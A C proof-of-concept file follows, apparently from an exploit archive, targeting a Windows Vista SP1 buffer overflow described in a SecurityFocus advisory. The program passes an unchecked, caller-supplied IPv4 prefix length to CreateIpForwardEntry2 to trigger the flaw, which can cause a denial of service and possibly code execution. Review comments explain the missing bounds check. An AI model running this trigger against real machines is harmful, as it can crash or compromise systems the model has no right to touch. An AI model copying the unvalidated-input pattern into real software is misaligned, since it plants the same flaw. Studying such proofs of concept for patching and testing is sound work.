// source: https://www.securityfocus.com/bid/32357/info
// Microsoft Windows Vista is prone to a buffer-overflow vulnerability because of insufficient boundary checks.
// Local attackers could exploit this issue to cause denial-of-service conditions. Given the nature of this issue, attackers may also be able to execute arbitrary code with SYSTEM-level privileges, but this has not been confirmed.
// Windows Vista SP1 is vulnerable to this issue.
// UPDATE (November 25, 2008): Because this issue may be exploitable only by members of the Administrators group, its security impact may be negated.
#define _WIN32_WINNT 0x0600
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <winsock2.h>
#include <ws2ipdef.h>
#include <iphlpapi.h>
#include <stdio.h>
#include <stdlib.h>
/*
 * Build a single manual IPv4 route row from the command line and submit it
 * with CreateIpForwardEntry2(); the status of that call becomes the process
 * exit code.
 *
 *   argv[1]  interface index        -> InterfaceIndex
 *   argv[2]  prefix length in bits  -> DestinationPrefix.PrefixLength
 *
 * Both arguments go through atoi() and are stored with no range or error
 * check, so the API receives whatever the caller typed (atoi() also yields 0
 * for non-numeric text).
 *
 * NOTE(review): the advisory text at the top of this file attributes the
 * issue to insufficient boundary checks; the unchecked prefix length is
 * presumably the input it concerns -- confirm against the vendor fix. An IPv4
 * prefix is at most 32 bits, so code that is not a deliberate regression
 * test should reject values outside 0..32 for AF_INET before making the call.
 *
 * NOTE(review): on a build that validates the row, the call is expected to
 * return an error status rather than NO_ERROR -- verify on the target build.
 */
int main(int argc, char** argv)
{
    MIB_IPFORWARD_ROW2 row;
    SOCKADDR_INET *dest;
    SOCKADDR_INET *gateway;

    if (argc != 3) {
        printf("Usage: %s <ifNum> <numOfBits>\n\n", argv[0]);
        return -1;
    }

    /* Start from the API's default row contents before overriding fields. */
    InitializeIpForwardEntry(&row);

    dest = &row.DestinationPrefix.Prefix;
    gateway = &row.NextHop;

    /* Interface index comes straight from the command line, unvalidated. */
    row.InterfaceIndex = atoi(argv[1]);

    /* Fixed IPv4 destination network; only its prefix length is caller-supplied. */
    dest->si_family = AF_INET;
    dest->Ipv4.sin_addr.s_addr = inet_addr("1.2.3.0");
    dest->Ipv4.sin_family = AF_INET;

    /* Caller-supplied bit count, stored without any bounds check. */
    row.DestinationPrefix.PrefixLength = atoi(argv[2]);

    /* Fixed IPv4 next hop. */
    gateway->Ipv4.sin_addr.s_addr = inet_addr("11.22.33.44");
    gateway->Ipv4.sin_family = AF_INET;

    /* Remaining fields: a manually created route with maximal lifetimes. */
    row.SitePrefixLength = 0;
    row.Protocol = MIB_IPPROTO_NETMGMT;
    row.Origin = NlroManual;
    row.ValidLifetime = 0xffffffff;
    row.PreferredLifetime = 0xffffffff;
    row.Metric = 1;

    /* Hand the row to the IP helper API and report its status to the shell. */
    return CreateIpForwardEntry2(&row);
}